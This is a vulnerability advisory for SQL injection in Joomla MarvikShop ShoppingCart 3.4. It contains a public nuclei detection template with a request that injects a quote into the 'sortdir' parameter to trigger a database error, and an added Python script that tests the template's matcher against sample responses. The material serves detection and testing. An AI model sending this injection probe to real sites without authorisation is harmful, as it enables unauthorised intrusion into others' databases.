joomla-marvikshop-sqli: Joomla MarvikShop ShoppingCart 3.4 - Sql Injection

Date: 2025-08-01 | Affected software: Joomla MarvikShop | PoC: public

Vulnerability description

Joomla MarvikShop ShoppingCart 3.4 is vulnerable to SQL injection. SQL injection is a code injection technique in which attacker-controlled input from a web request is placed into a SQL statement, letting the attacker alter the query and potentially read, modify or destroy database contents; it remains one of the most common web attack techniques.

PoC code [public]

id: joomla-marvikshop-sqli

info:
  name: Joomla MarvikShop ShoppingCart 3.4 - Sql Injection
  author: r3Y3r53
  severity: high
  description: |
    Joomla MarvikShop ShoppingCart 3.4 is vulnerable to SQL injection which is a code injection technique that might destroy your database. SQL injection is one of the most common web hacking techniques. SQL injection is the placement of malicious code in SQL statements, via web page input.
  reference:
    - https://vulners.com/zdt/1337DAY-ID-38020
    - https://cxsecurity.com/issue/WLB-2022100015
    - https://extensions.joomla.org/
  metadata:
    verified: true
    max-request: 1
  tags: joomla,marvikshop,sqli,unauth,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=%27"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "You have an error in your SQL syntax") && contains(body, "manufacturers_id") && contains(body, "products_price")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502205ac0d22053285756faa4e26fcf04ffac2ecff0b5b05fdf1770812080cf39edce022100f91ee053ee7bea2c0103c1deb98875dfe91d095b61d85896af06c175066ec073:922c64590222798bb761d5b6d8e72950
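The template above only reports a finding when all three DSL lines hold: the MySQL syntax-error message must appear together with the `manufacturers_id` and `products_price` column names, the response must be HTML, and the status must be 200. The following is an added example, not part of the template or of nuclei, that dry-runs that matcher logic over constructed sample responses so the rule can be checked for false positives offline. The `Response` objects are constructed data, and `dsl_contains()` is a stand-in for nuclei's `contains` DSL function rather than nuclei's own implementation.

```python
"""Dry-run of the matcher block from the joomla-marvikshop-sqli template.

Added example: the Response objects below are constructed sample data, not
captured traffic, and dsl_contains() is a stand-in for nuclei's `contains`
DSL function rather than nuclei's own implementation.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Response:
    """The three response fields the template's DSL refers to."""
    status_code: int
    content_type: str
    body: str


# Strings taken verbatim from the template's matcher block.
SQL_ERROR_SIGNATURE = "You have an error in your SQL syntax"
REQUIRED_COLUMN_NAMES = ("manufacturers_id", "products_price")


def dsl_contains(haystack: str, needle: str) -> bool:
    """Stand-in for nuclei's contains(): case-sensitive substring test."""
    return needle in haystack


def matcher_results(resp: Response) -> dict:
    """Evaluate each DSL line separately so a failed match is explainable."""
    return {
        "sql_error_with_schema": (
            dsl_contains(resp.body, SQL_ERROR_SIGNATURE)
            and all(dsl_contains(resp.body, col) for col in REQUIRED_COLUMN_NAMES)
        ),
        "html_content_type": dsl_contains(resp.content_type, "text/html"),
        "status_200": resp.status_code == 200,
    }


def matches_template(resp: Response) -> bool:
    """condition: and -- every DSL line must hold for a finding."""
    return all(matcher_results(resp).values())


# Constructed responses covering the cases a detection engineer wants to test.
VULNERABLE = Response(
    status_code=200,
    content_type="text/html; charset=utf-8",
    body=(
        "<html><body>You have an error in your SQL syntax; check the manual ... "
        "near ''' at line 1 SELECT products_price FROM ... "
        "WHERE manufacturers_id = 7 ORDER BY latest '</body></html>"
    ),
)

# A fixed install that rejects the bad sort direction instead of echoing a DB error.
PATCHED = Response(
    status_code=200,
    content_type="text/html; charset=utf-8",
    body="<html><body>Invalid sort direction.</body></html>",
)

# An unrelated MySQL error page: right signature, but no schema names and a 500.
UNRELATED_ERROR = Response(
    status_code=500,
    content_type="text/html",
    body="You have an error in your SQL syntax near 'x'",
)


def triage(responses: dict) -> list:
    """Return the labels of the responses the template would flag."""
    return [label for label, resp in responses.items() if matches_template(resp)]


if __name__ == "__main__":
    samples = {"vulnerable": VULNERABLE, "patched": PATCHED, "unrelated": UNRELATED_ERROR}
    for label, resp in samples.items():
        print(f"{label:10s} {matcher_results(resp)} -> {matches_template(resp)}")
    print("flagged:", triage(samples))
```

Running the script shows why the template requires the column names in addition to the generic MySQL error string: a stray syntax error from some other component (the `UNRELATED_ERROR` sample) fails both the schema check and the status check, while the patched response fails the error-signature check, so only the vulnerable sample is flagged.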
